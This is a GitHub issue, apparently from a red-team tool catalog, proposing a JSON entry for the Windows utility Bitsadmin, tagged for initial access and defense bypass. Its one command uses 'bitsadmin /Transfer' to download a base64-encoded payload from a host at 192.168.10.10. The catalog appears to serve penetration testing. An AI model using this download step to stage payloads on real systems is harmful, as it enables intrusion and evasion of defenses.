Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

New tool: Bitsadmin #123

Closed
Patrick-DE opened this issue Jan 3, 2024 · 0 comments
Closed

New tool: Bitsadmin #123

Patrick-DE opened this issue Jan 3, 2024 · 0 comments
Assignees
Labels
enhancement New feature or request

Comments

@Patrick-DE
Copy link
Owner

Patrick-DE commented Jan 3, 2024

{
  "id": "71f7a06f-0587-44f3-a78f-80ad2a3b0f36",
  "name": "Bitsadmin",
  "phases": ["Initial Access", "Bypassing Defenses"],
  "category": "Windows Utility",
  "stealthy": false,
  "platforms": ["Windows"],
  "source": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin",
  "description": "Bitsadmin is a command-line tool in Windows used to create and monitor download or upload jobs and manage the Background Intelligent Transfer Service (BITS).",
  "undetected": [],
  "detected": [],
  "commands": [
    {
      "id": "b54896cb-57a8-42b3-bbcd-370e5cf77e7e",
      "name": "Download base64 encoded Payload",
      "description": "Download a payload.",
      "tag": "BITS:JOB_COMPLETE",
      "results": ["BITS:JOB_COMPLETED"],
      "cmd": "bitsadmin /Transfer myJob http://192.168.10.10/file.txt C:\\Users\\user\\enc.txt",
      "requirements": {
        "and": [
          { "tag": "BITS" },
          { "tag": "AUTHENTICATION" }
        ]
      }
    }
  ],
  "latest_commit": "",
  "language": "Windows Command Line"
}
@Patrick-DE Patrick-DE added the enhancement New feature or request label Jan 3, 2024
@Patrick-DE Patrick-DE self-assigned this Jan 3, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
enhancement New feature or request
Projects
None yet
Development

No branches or pull requests

1 participant